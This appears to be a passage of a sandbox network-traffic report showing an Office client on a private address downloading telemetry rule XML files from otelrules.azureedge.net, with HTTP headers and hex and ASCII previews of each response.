                                                                                                                    2024-11-30 10:35:49 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    137192.168.2.44988013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:49 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:49 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:49 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1364
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                    ETag: "0x8DC582BE1223606"
                                                                                                                    x-ms-request-id: 5259bbd7-401e-008c-0b01-4286c2000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103549Z-174f7845968ljs8phC1EWRe6en000000113g000000006utk
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:49 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    138192.168.2.44988813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:50 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:50 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:50 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1390
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                    ETag: "0x8DC582BE3002601"
                                                                                                                    x-ms-request-id: 951aba40-201e-0085-5291-3f34e3000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103550Z-174f7845968pf68xhC1EWRr4h800000011m0000000003t22
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:50 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    139192.168.2.44988913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:50 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:50 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:50 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1401
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                    ETag: "0x8DC582BE2A9D541"
                                                                                                                    x-ms-request-id: 2150929f-401e-0064-4382-3f54af000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103550Z-174f7845968kdththC1EWRzvxn0000000dq0000000003t02
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:50 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    140192.168.2.44989013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:51 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:51 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:51 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1364
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                    ETag: "0x8DC582BEB6AD293"
                                                                                                                    x-ms-request-id: 902f1521-d01e-00a1-2fef-4135b1000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103551Z-174f7845968px8v7hC1EWR08ng00000011n0000000002cr1
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:51 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    141192.168.2.44989113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:51 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:51 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:51 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1391
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                    ETag: "0x8DC582BDF58DC7E"
                                                                                                                    x-ms-request-id: 6de228a0-301e-0052-2e05-4165d6000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103551Z-174f7845968psccphC1EWRuz9s00000011f0000000008c7b
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:51 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    142192.168.2.44989213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:51 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:52 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:51 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1354
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                    ETag: "0x8DC582BE0662D7C"
                                                                                                                    x-ms-request-id: bc455531-901e-0064-7a1b-41e8a6000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103551Z-174f784596886s2bhC1EWR743w00000011dg0000000021bp
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:52 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    143192.168.2.44989313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:52 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:52 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:52 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1403
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                    ETag: "0x8DC582BDCDD6400"
                                                                                                                    x-ms-request-id: ee9d2ac9-001e-00a2-1991-3fd4d5000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103552Z-174f78459685m244hC1EWRgp2c0000001140000000005z37
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:52 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    144192.168.2.44989413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:52 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:53 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:52 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1366
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                    ETag: "0x8DC582BDF1E2608"
                                                                                                                    x-ms-request-id: 31cf5fb0-e01e-003c-261e-41c70b000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103552Z-174f7845968glpgnhC1EWR7uec00000011b000000000agcx
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:53 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    145192.168.2.44989513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:53 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:53 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:53 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1399
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                    ETag: "0x8DC582BE8C605FF"
                                                                                                                    x-ms-request-id: b12f5008-901e-002a-4fa2-427a27000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103553Z-174f7845968j6t2phC1EWRcfe800000011cg000000009gwy
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:53 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    146192.168.2.44989613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:53 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:54 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:53 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1362
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                    ETag: "0x8DC582BDF497570"
                                                                                                                    x-ms-request-id: 581105fc-301e-0000-6a91-3feecc000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103553Z-174f7845968px8v7hC1EWR08ng00000011fg000000007wa7
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
